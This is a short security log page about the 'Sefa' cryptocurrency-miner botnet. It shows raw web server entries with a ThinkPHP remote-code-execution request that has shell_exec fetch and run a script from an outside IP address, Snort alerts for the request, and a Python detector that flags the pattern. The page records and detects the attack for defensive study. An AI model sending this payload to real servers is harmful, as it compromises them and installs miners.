Sefa miner botnet | Joachim De Zutter
January 2019

Log entries:
167.99.214.206 - - [14/Jan/2019:00:18:57 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 404 207 "-" "Sefa"
167.99.214.206 - - [14/Jan/2019:00:19:12 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 404 207 "-" "Sefa"
Snort alerts:
01/14-00:18:57.339166  [**] [1:1330:6] WEB-ATTACKS wget command attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:18:57.339166  [**] [1:2026731:2] ET WEB_SERVER ThinkPHP RCE Exploitation Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:18:57.339166  [**] [1:2009363:7] ET WEB_SERVER Suspicious Chmod Usage in URI [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:1330:6] WEB-ATTACKS wget command attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:2026731:2] ET WEB_SERVER ThinkPHP RCE Exploitation Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:2009363:7] ET WEB_SERVER Suspicious Chmod Usage in URI [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80
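As an added example (not part of the original post), a small Python detector that parses combined-format access-log lines like the two above, flags the ThinkPHP `invokefunction` RCE pattern, and pulls out the invoked PHP function and the dropper URL for blocking; the first sample line is this page's first entry, the second is a constructed benign request.

```python
import re
from urllib.parse import unquote

# Sample input: line 1 is the first log entry from this page; line 2 is a
# constructed benign request used as a negative control.
SAMPLE_LOG = r'''167.99.214.206 - - [14/Jan/2019:00:18:57 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 404 207 "-" "Sefa"
192.0.2.10 - - [14/Jan/2019:00:20:01 +0200] "GET /index.php?s=/index/help HTTP/1.1" 200 512 "-" "Mozilla/5.0"'''

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# ThinkPHP controller-name injection: one or more backslashes (the server may
# escape them in the log) followed by think\app/invokefunction.
THINKPHP_RE = re.compile(r'\\+think\\+app/invokefunction', re.I)
URL_RE = re.compile(r'https?://[^\s;&"\']+')


def detect_thinkphp_rce(line):
    """Return a finding dict for a ThinkPHP invokefunction RCE attempt, else None."""
    m = LOG_RE.match(line)
    if not m or not THINKPHP_RE.search(m['path']):
        return None
    query = unquote(m['path']).partition('?')[2]
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params.setdefault(key, []).append(value)
    # vars[0] is the PHP function handed to call_user_func_array; vars[1][]
    # holds its argument(s), which for shell_exec is the shell command line.
    command = ' ; '.join(params.get('vars[1][]', []))
    return {
        'source_ip': m['ip'],
        'timestamp': m['ts'],
        'status': int(m['status']),
        'user_agent': m['ua'],
        'php_function': params.get('vars[0]', [''])[0],
        'command': command,
        'download_urls': URL_RE.findall(command),  # dropper hosts to block
    }


def scan_log(text):
    """Run the detector over every line of an access log and collect findings."""
    return [f for f in (detect_thinkphp_rce(l) for l in text.splitlines()) if f]
```

The 404 on the entries above means the request was not served; the same request answered with 200 would warrant treating the host as possibly compromised and checking /tmp for the downloaded script.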

Multiple Cryptocurrency Miner Botnets Start to Exploit the New ThinkPHP Vulnerability